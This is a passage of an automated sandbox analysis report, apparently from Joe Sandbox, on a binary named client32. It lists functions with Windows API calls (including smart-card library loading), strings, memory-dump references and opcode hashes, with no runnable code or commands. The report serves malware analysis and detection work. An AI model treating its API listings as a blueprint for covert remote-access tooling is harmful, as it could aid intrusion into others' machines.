                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                • String ID: edit
                                                                                • API String ID: 1305092643-2167791130
                                                                                • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                • _memmove.LIBCMT ref: 11009336
                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                • String ID: string too long
                                                                                • API String ID: 2168136238-2556327735
                                                                                • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 256744135-2556327735
                                                                                • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _calloc.LIBCMT ref: 1103B162
                                                                                • _free.LIBCMT ref: 1103B25B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                • String ID: CLTCONN.CPP
                                                                                • API String ID: 183652615-2872349640
                                                                                • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                                • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: L
                                                                                • API String ID: 1338273076-2909332022
                                                                                • Opcode ID: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                • Opcode Fuzzy Hash: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                                Function 11147850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,00000010,00000401,?,?,76968400,00000010), ref: 111478DB
                                                                                • wvsprintfA.USER32(00000010,?,?), ref: 111478F2
                                                                                Strings
                                                                                • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114790A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FormatMessagewvsprintf
                                                                                • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                • API String ID: 65494530-3330918973
                                                                                • Opcode ID: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                • Instruction ID: 19ecc3acc586c3c0044aa7ac842438cb7b35c94f742bf7000cc937f5be2b0cb7
                                                                                • Opcode Fuzzy Hash: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                • Instruction Fuzzy Hash: 3E21B6B5D0026DAEEB10CF90DC81FEAFBBCEB44618F104169E61993640E7756E44CBE5
                                                                                Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110AD1E3
                                                                                  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                                • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                Strings
                                                                                • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad_memset
                                                                                • String ID: winscard.dll is NOT valid!!!
                                                                                • API String ID: 212038770-1939809930
                                                                                • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                • String ID: string too long
                                                                                • API String ID: 963545896-2556327735
                                                                                • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                                • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemText
                                                                                • String ID: ...
                                                                                • API String ID: 3367045223-440645147
                                                                                • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                Function 110B9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
                                                                                  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
                                                                                  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
                                                                                  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
                                                                                  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
                                                                                  • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
                                                                                  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                                • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                                Strings
                                                                                • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
